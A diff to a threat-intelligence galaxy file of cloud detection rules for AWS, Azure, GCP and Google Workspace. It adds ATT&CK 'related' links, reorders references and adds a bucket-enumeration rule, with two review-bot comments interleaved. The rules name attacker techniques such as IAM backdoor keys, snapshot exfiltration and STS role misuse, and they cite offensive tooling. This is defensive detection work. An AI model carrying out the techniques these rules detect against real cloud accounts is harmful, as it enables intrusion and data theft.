+ "dest-uuid": "f8ef3a62-3f44-40a4-abca-761ab235c436",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "6ad91e31-53df-4826-bd27-0166171c8040",
 "value": "Google Cloud Kubernetes Admission Controller"
 },
@@ -54612,6 +70588,15 @@
 "attack.t1531"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "b24e2a20-3b3d-4bf0-823b-1ed765398fb0",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "13f81a90-a69c-4fab-8f07-b5bb55416a9f",
 "value": "Google Cloud Service Account Disabled or Deleted"
 },
@@ -54653,8 +70638,8 @@
 "logsource.category": "No established category",
 "logsource.product": "gcp",
 "refs": [
- "https://developers.google.com/resources/api-libraries/documentation/compute/v1/java/latest/com/google/api/services/compute/Compute.PacketMirrorings.html",
 "https://cloud.google.com/kubernetes-engine/docs/how-to/audit-logging",
+ "https://developers.google.com/resources/api-libraries/documentation/compute/v1/java/latest/com/google/api/services/compute/Compute.PacketMirrorings.html",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gcp_full_network_traffic_packet_capture.yml"
 ],
 "tags": [
@@ -54662,6 +70647,15 @@
 "attack.t1074"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "7dd95ff6-712e-4056-9626-312ea4ab4c5e",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "980a7598-1e7f-4962-9372-2d754c930d0e",
 "value": "Google Full Network Traffic Packet Capture"
 },
@@ -54679,8 +70673,8 @@
 "logsource.product": "google_workspace",
 "refs": [
 "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-domain-settings?hl=en#REMOVE_APPLICATION_FROM_WHITELIST",
- "https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3",
 "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-domain-settings?hl=en#REMOVE_APPLICATION",
+ "https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gworkspace/gworkspace_application_removed.yml"
 ],
 "tags": [
@@ -54712,6 +70706,15 @@
 "attack.t1098"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "a10641f4-87b4-45a3-a906-92a149cb2c27",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "2d1b83e4-17c6-4896-a37b-29140b40a788",
 "value": "Google Workspace User Granted Admin Privileges"
 },
@@ -54776,8 +70779,8 @@ "logsource.category": "No established category", "logsource.product": "google_workspace", "refs": [ - "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-security-settings#ENFORCE_STRONG_AUTHENTICATION", "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-security-settings?hl=en#ALLOW_STRONG_AUTHENTICATION", + "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-security-settings#ENFORCE_STRONG_AUTHENTICATION", "https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gworkspace/gworkspace_mfa_disabled.yml" ], @@ -54801,8 +70804,8 @@ "logsource.category": "No established category", "logsource.product": "google_workspace", "refs": [ - "https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3", "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-domain-settings#AUTHORIZE_API_CLIENT_ACCESS", + "https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gworkspace/gworkspace_granted_domain_api_access.yml" ], "tags": [ @@ -54810,6 +70813,15 @@ "attack.t1098" ] }, + "related": [ + { + "dest-uuid": "a10641f4-87b4-45a3-a906-92a149cb2c27", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "04e2a23a-9b29-4a5c-be3a-3542e3f982ba", "value": "Google Workspace Granted Domain API Access" }, 
@@ -54872,13 +70884,13 @@ "logsource.category": "No established category", "logsource.product": "aws", "refs": [ + "https://docs.aws.amazon.com/AmazonS3/latest/API/API_PutBucketEncryption.html", "https://docs.aws.amazon.com/AmazonS3/latest/API/API_PutBucketLogging.html", - "https://docs.aws.amazon.com/AmazonS3/latest/API/API_RestoreObject.html", - "https://docs.aws.amazon.com/AmazonS3/latest/API/API_PutBucketWebsite.html", "https://github.com/elastic/detection-rules/pull/1145/files", "https://docs.aws.amazon.com/AmazonS3/latest/userguide/setting-repl-config-perm-overview.html", + "https://docs.aws.amazon.com/AmazonS3/latest/API/API_RestoreObject.html", "https://docs.aws.amazon.com/AmazonS3/latest/API/API_Operations.html", - "https://docs.aws.amazon.com/AmazonS3/latest/API/API_PutBucketEncryption.html", + "https://docs.aws.amazon.com/AmazonS3/latest/API/API_PutBucketWebsite.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_s3_data_management_tampering.yml" ], "tags": [ @@ -54886,6 +70898,15 @@ "attack.t1537" ] }, + "related": [ + { + "dest-uuid": "d4bdbdea-eaec-4071-b4f9-5105e12ea4b6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "78b3756a-7804-4ef7-8555-7b9024a02e2d", "value": "AWS S3 Data Management Tampering" }, @@ -54912,6 +70933,22 @@ "attack.t1565" ] }, + "related": [ + { + "dest-uuid": "b80d107d-fa0d-4b60-9684-b0433e8bdba0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "ac9e6b22-11bf-45d7-9181-c1cb08360931", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "16124c2d-e40b-4fcc-8f2c-5ab7870a2223", "value": "AWS EC2 Disable EBS Encryption" }, 
@@ -54937,6 +70974,15 @@ "attack.t1098" ] }, + "related": [ + { + "dest-uuid": "a10641f4-87b4-45a3-a906-92a149cb2c27", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "0a5177f4-6ca9-44c2-aacf-d3f3d8b6e4d2", "value": "AWS IAM Backdoor Users Keys" }, @@ -54962,6 +71008,15 @@ "attack.t1562" ] }, + "related": [ + { + "dest-uuid": "3d333250-30e4-4a82-9edc-756c68afc529", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "a607e1fe-74bf-4440-a3ec-b059b9103157", "value": "AWS SecurityHub Findings Evasion" }, @@ -54978,7 +71033,6 @@ "logsource.category": "No established category", "logsource.product": "aws", "refs": [ - "https://attack.mitre.org/techniques/T1525", "https://docs.aws.amazon.com/AmazonECS/latest/APIReference/API_RegisterTaskDefinition.html", "https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/ecs__backdoor_task_def/main.py", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_ecs_task_definition_backdoor.yml" @@ -54988,6 +71042,15 @@ "attack.t1525" ] }, + "related": [ + { + "dest-uuid": "4fd8a28b-4b3a-4cd6-a8cf-85ba5f824a7f", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "b94bf91e-c2bf-4047-9c43-c6810f43baad", "value": "AWS ECS Backdoor Task Definition" }, @@ -55036,6 +71099,15 @@ "attack.t1619" ] }, + "related": [ + { + "dest-uuid": "8565825b-21c8-4518-b75e-cbc4c717a156", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "4723218f-2048-41f6-bcb0-417f2d784f61", "value": "Potential Storage Enumeration on AWS" }, 
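Review bot: The hunk `@@ -54978,7 +71033,6 @@` drops `https://attack.mitre.org/techniques/T1525` from `refs` while the next hunk adds a `related` entry for the same technique, and the same removal appears at L6862, L6871 and L6879. If the intent is to de-duplicate what `related` now encodes, the commit description should say so, because in the L6871 and L6879 hunks the corresponding `related` block is outside the visible hunk and a consumer reading `refs` alone silently loses the citation. Keeping the technique URL in `refs` costs nothing and leaves each cluster self-describing for tools that do not follow `related`.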
@@ -55053,7 +71125,6 @@ "logsource.product": "aws", "refs": [ "https://www.justice.gov/file/1080281/download", - "https://attack.mitre.org/techniques/T1537/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_snapshot_backup_exfiltration.yml" ], "tags": [ @@ -55061,6 +71132,15 @@ "attack.t1537" ] }, + "related": [ + { + "dest-uuid": "d4bdbdea-eaec-4071-b4f9-5105e12ea4b6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "abae8fec-57bd-4f87-aff6-6e3db989843d", "value": "AWS Snapshot Backup Exfiltration" }, @@ -55085,6 +71165,15 @@ "attack.t1580" ] }, + "related": [ + { + "dest-uuid": "57a3d31a-d04f-4663-b2da-7df8ec3f8c9d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "76255e09-755e-4675-8b6b-dbce9842cd2a", "value": "Potential Backup Enumeration on AWS" }, @@ -55109,6 +71198,15 @@ "attack.t1485" ] }, + "related": [ + { + "dest-uuid": "d45a3d09-b3cf-48f4-9f0f-f521ee5cb05c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "6a7ba45c-63d8-473e-9736-2eaabff79964", "value": "AWS EFS Fileshare Mount Modified or Deleted" }, @@ -55134,6 +71232,15 @@ "attack.t1098" ] }, + "related": [ + { + "dest-uuid": "a10641f4-87b4-45a3-a906-92a149cb2c27", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "b056de1a-6e6e-4e40-a67e-97c9808cf41b", "value": "AWS Route 53 Domain Transferred to Another Account" }, @@ -55158,6 +71265,15 @@ "attack.resource_development" ] }, + "related": [ + { + "dest-uuid": "88d31120-5bc7-4ce3-a9c0-7cf147be8e54", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "60b84424-a724-4502-bd0d-cc676e1bc90e", "value": "Potential AWS Cloud Email Service Abuse" }, 
@@ -55213,6 +71329,22 @@ "attack.t1550.001" ] }, + "related": [ + { + "dest-uuid": "67720091-eee3-4d2d-ae16-8264567f6f5b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "51a14c76-dd3b-440b-9c20-2bf91d25a814", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "905d389b-b853-46d0-9d3d-dea0d3a3cd49", "value": "AWS STS AssumeRole Misuse" }, @@ -55237,6 +71369,15 @@ "attack.t1020" ] }, + "related": [ + { + "dest-uuid": "774a3188-6ba9-4dc4-879d-d54ee48a5ce9", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "8a63cdd4-6207-414a-85bc-7e032bd3c1a2", "value": "AWS RDS Master Password Change" }, @@ -55261,6 +71402,15 @@ "attack.t1531" ] }, + "related": [ + { + "dest-uuid": "b24e2a20-3b3d-4bf0-823b-1ed765398fb0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "7c797da2-9cf2-4523-ba64-33b06339f0cc", "value": "AWS ElastiCache Security Group Modified or Deleted" }, @@ -55279,8 +71429,8 @@ "logsource.category": "No established category", "logsource.product": "aws", "refs": [ - "https://docs.aws.amazon.com/STS/latest/APIReference/API_AssumeRoleWithSAML.html", "https://docs.aws.amazon.com/IAM/latest/APIReference/API_UpdateSAMLProvider.html", + "https://docs.aws.amazon.com/STS/latest/APIReference/API_AssumeRoleWithSAML.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_susp_saml_activity.yml" ], "tags": [ 
@@ -55293,6 +71443,22 @@ "attack.t1550.001" ] }, + "related": [ + { + "dest-uuid": "67720091-eee3-4d2d-ae16-8264567f6f5b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "51a14c76-dd3b-440b-9c20-2bf91d25a814", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "f43f5d2f-3f2a-4cc8-b1af-81fde7dbaf0e", "value": "AWS Suspicious SAML Activity" }, @@ -55319,6 +71485,15 @@ "attack.t1485" ] }, + "related": [ + { + "dest-uuid": "d45a3d09-b3cf-48f4-9f0f-f521ee5cb05c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "33d50d03-20ec-4b74-a74e-1e65a38af1c0", "value": "AWS EKS Cluster Created or Deleted" }, @@ -55343,6 +71518,15 @@ "attack.t1020" ] }, + "related": [ + { + "dest-uuid": "774a3188-6ba9-4dc4-879d-d54ee48a5ce9", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "c3f265c7-ff03-4056-8ab2-d486227b4599", "value": "Restore Public AWS RDS Instance" }, 
@@ -55393,9 +71577,67 @@ "attack.t1059.004" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "d1fcf083-a721-4223-aedf-bf8960798d62", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "a9d4b653-6915-42af-98b2-5758c4ceee56", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "1ab3c5ed-5baf-417b-bb6b-78ca33f6c3df", "value": "AWS EC2 Startup Shell Script Change" }, + { + "description": "Looks for potential enumeration of AWS buckets via ListBuckets.", + "meta": { + "author": "Christopher Peacock @securepeacock, SCYTHE @scythe_io", + "creation_date": "2023/01/06", + "falsepositive": [ + "Administrators listing buckets, it may be necessary to filter out users who commonly conduct this activity." 
+ ], + "filename": "aws_enum_buckets.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "aws", + "refs": [ + "https://jamesonhacking.blogspot.com/2020/12/pivoting-to-private-aws-s3-buckets.html", + "https://securitycafe.ro/2022/12/14/aws-enumeration-part-ii-practical-enumeration/", + "https://github.com/Lifka/hacking-resources/blob/c2ae355d381bd0c9f0b32c4ead049f44e5b1573f/cloud-hacking-cheat-sheets.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_enum_buckets.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1580" + ] + }, + "related": [ + { + "dest-uuid": "57a3d31a-d04f-4663-b2da-7df8ec3f8c9d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], + "uuid": "f305fd62-beca-47da-ad95-7690a0620084", + "value": "Potential Bucket Enumeration on AWS" + }, { "description": "An attacker with the iam:UpdateLoginProfile permission on other users can change the password used to login to the AWS console on any user that already has a login profile setup.\nWith this alert, it is used to detect anyone is changing password on behalf of other users.\n", "meta": { @@ -55417,6 +71659,15 @@ "attack.t1098" ] }, + "related": [ + { + "dest-uuid": "a10641f4-87b4-45a3-a906-92a149cb2c27", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "055fb148-60f8-462d-ad16-26926ce050f1", "value": "AWS User Login Profile Was Modified" }, 
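Review bot: The new cluster `Potential Bucket Enumeration on AWS` (its hunk starts at L6865) records its source rule only as `https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_enum_buckets.yml`, an unpinned branch URL, whereas the neighbouring `Lifka/hacking-resources` ref is pinned to a commit. When upstream moves or renames the rule the link rots and the cluster loses its provenance; if the generator knows the SigmaHQ commit it read from, pinning that URL to the commit (or recording the commit once in the galaxy metadata) would keep it stable. This appears to be the convention for every entry in the file, so it is a generator change rather than something to hand-edit in this hunk.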
@@ -55441,6 +71692,22 @@ "attack.t1537" ] }, + "related": [ + { + "dest-uuid": "3c4a2599-71ee-4405-ba1e-0e28414b4bc5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "d4bdbdea-eaec-4071-b4f9-5105e12ea4b6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "54b9a76a-3c71-4673-b4b3-2edb4566ea7b", "value": "AWS EC2 VM Export Failure" }, @@ -55465,6 +71732,15 @@ "attack.t1020" ] }, + "related": [ + { + "dest-uuid": "774a3188-6ba9-4dc4-879d-d54ee48a5ce9", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "26ff4080-194e-47e7-9889-ef7602efed0c", "value": "AWS EC2 Download Userdata" }, @@ -55481,8 +71757,8 @@ "logsource.category": "No established category", "logsource.product": "aws", "refs": [ - "https://github.com/elastic/detection-rules/pull/1213", "https://docs.aws.amazon.com/STS/latest/APIReference/API_GetSessionToken.html", + "https://github.com/elastic/detection-rules/pull/1213", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_sts_getsessiontoken_misuse.yml" ], "tags": [ @@ -55493,6 +71769,22 @@ "attack.t1550.001" ] }, + "related": [ + { + "dest-uuid": "67720091-eee3-4d2d-ae16-8264567f6f5b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "51a14c76-dd3b-440b-9c20-2bf91d25a814", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "b45ab1d2-712f-4f01-a751-df3826969807", "value": "AWS STS GetSessionToken Misuse" }, 
@@ -55557,9 +71849,9 @@ "logsource.category": "No established category", "logsource.product": "aws", "refs": [ + "https://github.com/elastic/detection-rules/blob/c76a39796972ecde44cb1da6df47f1b6562c9770/rules/integrations/aws/persistence_route_53_domain_transfer_lock_disabled.toml", "https://docs.aws.amazon.com/Route53/latest/APIReference/API_domains_DisableDomainTransferLock.html", "https://docs.aws.amazon.com/Route53/latest/APIReference/API_Operations_Amazon_Route_53.html", - "https://github.com/elastic/detection-rules/blob/c76a39796972ecde44cb1da6df47f1b6562c9770/rules/integrations/aws/persistence_route_53_domain_transfer_lock_disabled.toml", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_route_53_domain_transferred_lock_disabled.yml" ], "tags": [ @@ -55568,6 +71860,15 @@ "attack.t1098" ] }, + "related": [ + { + "dest-uuid": "a10641f4-87b4-45a3-a906-92a149cb2c27", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "3940b5f1-3f46-44aa-b746-ebe615b879e0", "value": "AWS Route 53 Domain Transfer Lock Disabled" }, @@ -55638,6 +71939,15 @@ "attack.t1592" ] }, + "related": [ + { + "dest-uuid": "09312b1a-c3c6-4b45-9844-3ccc78e5d82f", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "e9c14b23-47e2-4a8b-8a63-d36618e33d70", "value": "Account Enumeration on AWS" }, @@ -55679,8 +71989,8 @@ "logsource.category": "No established category", "logsource.product": "aws", "refs": [ - "https://docs.aws.amazon.com/glue/latest/webapi/API_CreateDevEndpoint.html", "https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/", + "https://docs.aws.amazon.com/glue/latest/webapi/API_CreateDevEndpoint.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_passed_role_to_glue_development_endpoint.yml" ], "tags": [ 
@@ -55711,6 +72021,15 @@ "attack.t1078.004" ] }, + "related": [ + { + "dest-uuid": "f232fa7a-025c-4d43-abc7-318e81a73d65", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "8ad1600d-e9dc-4251-b0ee-a65268f29add", "value": "AWS Root Credentials" }, @@ -55759,6 +72078,22 @@ "attack.t1136.003" ] }, + "related": [ + { + "dest-uuid": "e01be9c5-e763-4caf-aeb7-000b416aef67", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "a009cb25-4801-4116-9105-80a91cf15c1b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "4ae68615-866f-4304-b24b-ba048dfa5ca7", "value": "AWS ElastiCache Security Group Created" }, @@ -55783,6 +72118,15 @@ "attack.t1212" ] }, + "related": [ + { + "dest-uuid": "9c306d8d-cde7-4b4c-b6e8-d0bb16caca36", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "60f6535a-760f-42a9-be3f-c9a0a025906e", "value": "Use of Legacy Authentication Protocols" }, @@ -55886,7 +72230,7 @@ "value": "Applications That Are Using ROPC Authentication Flow" }, { - "description": "Change to authentication method could be an indicated of an attacker adding an auth method to the account so they can have continued access.", + "description": "Change to authentication method could be an indicator of an attacker adding an auth method to the account so they can have continued access.", "meta": { "author": "AlertIQ", "creation_date": "2021/10/10", 
@@ -55902,9 +72246,21 @@ "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_change_to_authentication_method.yml" ], "tags": [ - "attack.credential_access" + "attack.credential_access", + "attack.t1556", + "attack.persistence", + "attack.defense_evasion" ] }, + "related": [ + { + "dest-uuid": "f4c1826f-a322-41cd-9557-562100848c84", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "4d78a000-ab52-4564-88a5-7ab5242b20c7", "value": "Change to Authentication Method" }, @@ -55927,9 +72283,18 @@ "tags": [ "attack.persistence", "attack.defense_evasion", - "attack.t1078" + "attack.t1078.004" ] }, + "related": [ + { + "dest-uuid": "f232fa7a-025c-4d43-abc7-318e81a73d65", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "0b4b72e3-4c53-4d5b-b198-2c58cfef39a9", "value": "Guest User Invited By Non Approved Inviters" }, @@ -55983,6 +72348,15 @@ "attack.t1552.001" ] }, + "related": [ + { + "dest-uuid": "435dfb86-2697-4867-85b5-2fef496c0517", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "459a2970-bb84-4e6a-a32e-ff0fbd99448d", "value": "Azure Key Vault Modified or Deleted" }, @@ -56101,9 +72475,20 @@ "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_firewall_rule_collection_modified_or_deleted.yml" ], "tags": [ - "attack.impact" + "attack.impact", + "attack.defense_evasion", + "attack.t1562.004" ] }, + "related": [ + { + "dest-uuid": "5372c5fe-f424-4def-bcd5-d3a8e770f07b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "025c9fe7-db72-49f9-af0d-31341dd7dd57", "value": "Azure Firewall Rule Collection Modified or Deleted" }, 
@@ -56132,6 +72517,22 @@ "attack.t1552.007" ] }, + "related": [ + { + "dest-uuid": "435dfb86-2697-4867-85b5-2fef496c0517", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "f8ef3a62-3f44-40a4-abca-761ab235c436", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "a61a3c56-4ce2-4351-a079-88ae4cbd2b58", "value": "Azure Kubernetes Admission Controller" }, @@ -56155,6 +72556,15 @@ "attack.t1003" ] }, + "related": [ + { + "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "c1182e02-49a3-481c-b3de-0fadc4091488", "value": "Rare Subscription-level Operations In Azure" }, @@ -56229,6 +72639,15 @@ "attack.defense_evasion" ] }, + "related": [ + { + "dest-uuid": "890c9858-598c-401d-a4d5-c67ebcdd703a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "74298991-9fc4-460e-a92e-511aa60baec1", "value": "Added Owner To Application" }, @@ -56301,6 +72720,15 @@ "attack.t1098" ] }, + "related": [ + { + "dest-uuid": "a10641f4-87b4-45a3-a906-92a149cb2c27", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "91c95675-1f27-46d0-bead-d1ae96b97cd3", "value": "User Added To Group With CA Policy Modification Access" }, @@ -56343,7 +72771,6 @@ "logsource.product": "azure", "refs": [ "https://docs.microsoft.com/en-us/azure/active-directory/hybrid/how-to-connect-monitor-federation-changes", - "https://attack.mitre.org/techniques/T1078", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_federation_modified.yml" ], "tags": [ 
@@ -56448,6 +72875,15 @@ "attack.persistence" ] }, + "related": [ + { + "dest-uuid": "a10641f4-87b4-45a3-a906-92a149cb2c27", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "cbb67ecc-fb70-4467-9350-c910bdf7c628", "value": "Added Credentials to Existing Application" }, @@ -56470,9 +72906,27 @@ "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_device_or_configuration_modified_or_deleted.yml" ], "tags": [ - "attack.impact" + "attack.impact", + "attack.t1485", + "attack.t1565.001" ] }, + "related": [ + { + "dest-uuid": "d45a3d09-b3cf-48f4-9f0f-f521ee5cb05c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "1cfcb312-b8d7-47a4-b560-4b16cc677292", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "46530378-f9db-4af9-a9e5-889c177d3881", "value": "Azure Device or Configuration Modified or Deleted" }, @@ -56495,9 +72949,20 @@ "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_application_deleted.yml" ], "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.impact", + "attack.t1489" ] }, + "related": [ + { + "dest-uuid": "20fb2507-d71c-455d-9b6d-6104461cf26b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "410d2a41-1e6d-452f-85e5-abdd8257a823", "value": "Azure Application Deleted" }, @@ -56546,9 +73011,18 @@ ], "tags": [ "attack.initial_access", - "attack.t1078" + "attack.t1078.004" ] }, + "related": [ + { + "dest-uuid": "f232fa7a-025c-4d43-abc7-318e81a73d65", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "09438caa-07b1-4870-8405-1dbafe3dad95", "value": "Azure Subscription Permission Elevation Via ActivityLogs" }, 
@@ -56590,11 +73064,11 @@ "logsource.category": "No established category", "logsource.product": "azure", "refs": [ + "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/", + "https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1", "https://attack.mitre.org/matrices/enterprise/cloud/", "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", - "https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1", "https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/", - "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_kubernetes_cluster_created_or_deleted.yml" ], "tags": [ @@ -56625,6 +73099,15 @@ "attack.t1098" ] }, + "related": [ + { + "dest-uuid": "a10641f4-87b4-45a3-a906-92a149cb2c27", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "102e11e3-2db5-4c9e-bc26-357d42585d21", "value": "Bulk Deletion Changes To Privileged Account Permissions" }, @@ -56673,6 +73156,15 @@ "attack.t1098" ] }, + "related": [ + { + "dest-uuid": "a10641f4-87b4-45a3-a906-92a149cb2c27", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "49a268a4-72f4-4e38-8a7b-885be690c5b5", "value": "User Added To Privilege Role" }, 
